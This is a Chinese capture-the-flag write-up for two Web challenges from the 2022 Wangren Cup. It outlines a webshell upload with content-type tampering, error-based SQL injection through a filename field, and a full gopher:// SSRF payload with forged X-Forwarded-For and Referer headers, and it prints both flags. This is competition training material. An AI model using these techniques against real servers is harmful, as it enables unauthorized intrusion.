2022第二届网刃杯网络安全大赛-Web

前言

提示：该内容由夜刃TEOT战队-夜白君师傅原创，禁止抄袭！

一、Web2-upload

难度系数：4.0
题目描述：只有想不到，没有做不到，sql yyds。题目链接见附件，每个链接均可访问，环境5分钟重启一次。

文件上传，随便上传一个马
使用Burp抓包
根据提示，更改类型
上传文件
查询到filename上传点，报错注入,获取FLAG
flag{5937a0b90b5966939cccd369291c68aa}

二、Web3-Sign_in

难度系数：3.0
题目描述：炒鸡简单的签到题，玩的开心~~~~ 题目链接见附件，每个链接均可访问，环境5分钟重启一次。

通过ARP记录得到WEB地址
IP： 172.73.24.100
经过一步步的提示最终构造Payload 获取FLAG.
Payload:

http://124.220.9.19:20001/?
url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A

flag{Have_A_GoOd_T1m3!!!}

2022第二届网刃杯网络安全大赛-Web相关推荐

2022第二届网刃杯网络安全大赛-Re
2022第二届网刃杯网络安全大赛-Re 前言提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...
2022第二届网刃杯网络安全大赛-ICS
2022第二届网刃杯网络安全大赛-ICS 前言提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...
2022第二届网刃杯网络安全大赛
目录前言一.ICS1-ncsubj 二.ICS2-carefulguy 三.ICS3-喜欢移动的黑客四.ICS4-easyiec 五.ICS5-xyp07
第二届网刃杯网络安全大赛 Writeup
第二届网刃杯网络安全大赛 Writeup 前言 MISC 玩坏的XP * ISC ncsubj carefulguy easyiec xypo7 喜欢移动的黑客* LED_BOOM* 需要安全感* c ...
2021第一届网刃杯网络安全大赛-老练的黑客
2021第一届网刃杯网络安全大赛-老练的黑客难度系数:4.0 题目描述:一黑客成功入侵某核电站且获得了操作员站控制权,该操作员站可控制离心机的转速,当离心机的转速持续高于5000时将导致设备损坏,为 ...
首届“网刃杯”网络安全大赛部分WP
这是之前打比赛写的WP,供大家参考藏在S7里的秘密 1.修复流量包下载流量包打开后发现提示错报 The file"S7.pcap" isn't a capture file i ...
第二届网刃杯 ICS+Misc wp
文章目录 ICS LED_BOOM carefulguy 喜欢移动的黑客 easyiec xyp07 需要安全感 cryptolalia Misc 玩坏的winxp ICS LED_BOOM 一段对称 ...
[ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛（青龙组）
2022年第三届"网鼎杯"网络安全大赛(青龙组)部分题目附件已解题列表 [Misc]签到 [Crypto]crypto405 [Crypto]crypto091 [Pwn]pwn ...
网络安全的“奥运会”——第三届“网鼎杯”网络安全大赛即将开幕
乘风破浪潮头立,为国铸鼎正当时!以"数字未来,共同守护"为主题的2022年第三届"网鼎杯"网络安全大赛如约而至.大赛由公安部指导,"政产学研用&quo ...

2022第二届网刃杯网络安全大赛-Web

2022第二届网刃杯网络安全大赛-Web

前言

一、Web2-upload

二、Web3-Sign_in

2022第二届网刃杯网络安全大赛-Web相关推荐

最新文章

热门文章